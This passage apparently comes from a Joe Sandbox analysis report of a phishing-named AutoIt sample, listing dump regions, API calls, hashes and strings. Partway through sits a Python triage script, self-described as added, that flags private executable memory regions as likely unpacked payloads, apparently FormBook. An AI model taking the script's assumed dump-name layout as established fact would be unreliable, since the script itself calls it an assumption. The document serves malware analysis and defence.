                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                        • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                        • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                        • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                        • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                        • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                        • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                        • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 69dc32ec314a8cd99589289b842828c25465f5886d8d921c36f64ffc138c73b7
                                                        • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                        • Opcode Fuzzy Hash: 69dc32ec314a8cd99589289b842828c25465f5886d8d921c36f64ffc138c73b7
                                                        • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                        • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                        • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                        • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                        • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                        • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                        • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                        • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                        • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                        • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,016B399E,?,?,00000008,?,?,016B1CF4,00000000), ref: 016B3BD0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        APIs
                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction ID: 253b34d58c336bca19e22ec6265efad7029e42a2b0c96e6c0d0cbd4e0cb5b8dc
                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction Fuzzy Hash: 89019D78A01209EFCB48DF99C5909AEF7F5FB98310F2085D9E819A7705DB34AE41DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction ID: d803e56ca556341a0aadd47ca90843393cc76f1d96ec762b0c78935acb44b066
                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction Fuzzy Hash: 1C019278A00209EFCB44DF98C5919AEF7F5FB58310F2085D9E80AA7705D734AE51DB80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                        • Instruction Fuzzy Hash:
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,0048F910), ref: 00483627
                                                        • IsWindowVisible.USER32(?), ref: 0048364B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-45149045
                                                        • Opcode ID: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                                                        • Instruction ID: 9f5fdaa8788cae778637d634d7abea83d78ef325d3b9343814b8d9d38e530adb
                                                        • Opcode Fuzzy Hash: fed52f404a64f80c9a9dc2c1c4167444291c9d1648bc4a49fe8c5b5d29b77391
                                                        • Instruction Fuzzy Hash: 28D19E702042009BCA04FF11C451A6E77E5AF55759F54886EF8826B3A3DB3DEE0ACB5A
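The "Source File" names above encode where each analysed function was dumped from. The following is an added triage example, not code from Joe Sandbox or from this report: it parses the three distinct Source File lines that appear in this section (copied here as constructed input) and flags regions that are executable+writable, private and not PE-based, which is where an unpacked stage such as the FormBook payload this report detects normally lives. The Win32 PAGE_* and MEM_* constant values are standard; the field layout of the .sdmp name (field 4 = base address, field 5 = protection, field 7 = region type) is an assumption inferred from the values on this page, not documented Joe Sandbox behaviour.

```python
"""Decode Joe Sandbox .sdmp dump names and flag likely unpacked-code regions.

Added example (not part of the Joe Sandbox report or its tooling).
ASSUMPTION: in the dotted .sdmp name, field index 3 is the region base
address, index 4 the Win32 PAGE_* protection and index 6 the MEM_* type.
"""
import re
from dataclasses import dataclass

# Win32 memory constants from winnt.h (standard values).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Constructed input: the three distinct Source File lines from this report section.
SOURCE_LINES = [
    "Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false",
    "Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false",
    "Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true",
]

_LINE = re.compile(
    r"Source File: (?P<name>[0-9A-Fa-f.]+\.sdmp), Offset: (?P<off>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)"
)


@dataclass(frozen=True)
class Region:
    base: int
    protect: int
    mem_type: int
    pe_based: bool

    @property
    def protect_name(self) -> str:
        # Low byte holds the PAGE_* value; higher bits are modifiers (PAGE_GUARD etc.).
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    def is_unpacked_candidate(self) -> bool:
        """Writable+executable, private (not image-backed) and not a loaded PE."""
        writable_exec = (self.protect & 0xFF) in (0x40, 0x80)
        return writable_exec and self.mem_type == 0x20000 and not self.pe_based


def parse_source_line(line: str) -> Region:
    """Parse one 'Source File: ...sdmp, Offset: ..., based on PE: ...' line."""
    m = _LINE.search(line)
    if not m:
        raise ValueError(f"not a Source File line: {line!r}")
    fields = m.group("name")[: -len(".sdmp")].split(".")
    # ASSUMED layout: 0=process idx, 1=stage, 2=dump id, 3=base,
    # 4=protection, 5=(unknown), 6=region type, 7=module idx.
    return Region(
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
        mem_type=int(fields[6], 16),
        pe_based=(m.group("pe") == "true"),
    )


def triage(lines):
    """Return (base, protection, type, candidate) per distinct region, sorted by base."""
    seen = {}
    for line in lines:
        r = parse_source_line(line)
        seen[r.base] = (r.base, r.protect_name, r.type_name, r.is_unpacked_candidate())
    return [seen[b] for b in sorted(seen)]


if __name__ == "__main__":
    for base, prot, typ, cand in triage(SOURCE_LINES):
        flag = "UNPACKED-CANDIDATE" if cand else ""
        print(f"{base:#010x} {prot:<24} {typ:<12} {flag}")
```

On the lines above this yields two private RWX regions (0x00B62000 and 0x01670000) flagged as candidates and the image-backed 0x00401000 region (PAGE_EXECUTE_READ, MEM_IMAGE) left alone; those two private regions are the ones to carve and scan first, since the report's FormBook YARA hit is not going to come from the AutoIt runtime's own .text section.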
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 0048A630
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0048A661
                                                        • GetSysColor.USER32(0000000F), ref: 0048A66D
                                                        • SetBkColor.GDI32(?,000000FF), ref: 0048A687
                                                        • SelectObject.GDI32(?,00000000), ref: 0048A696
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
                                                        • GetSysColor.USER32(00000010), ref: 0048A6C9
                                                        • CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
                                                        • FrameRect.USER32(?,?,00000000), ref: 0048A6DF
                                                        • DeleteObject.GDI32(00000000), ref: 0048A6E6
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
                                                        • FillRect.USER32(?,?,00000000), ref: 0048A763
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
                                                          • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
                                                          • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
                                                          • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
                                                          • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                                                          • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
                                                          • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
                                                          • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
                                                          • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                                                          • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                                                          • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                                                          • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: 7e5f0819146bb3c495cfb567e5aa3783eeba3ae5088b840f990f8bc64d3ce610
                                                        • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                        • Opcode Fuzzy Hash: 7e5f0819146bb3c495cfb567e5aa3783eeba3ae5088b840f990f8bc64d3ce610
                                                        • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                        • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                        • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
                                                          • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                        • SendMessageW.USER32(?,00001053), ref: 0043C8DA
                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043C8F1
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C907
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043C912
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                        • String ID: 0
                                                        • API String ID: 464785882-4108050209
                                                        • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                        • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                                                        • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                                                        • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 004774DE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                                                        • GetClientRect.USER32(00000000,?), ref: 0047763F
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                                                        • GetStockObject.GDI32(00000011), ref: 004776A2
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                                                        • DeleteDC.GDI32(00000000), ref: 004776C8
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                                                        • GetStockObject.GDI32(00000011), ref: 004777A6
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
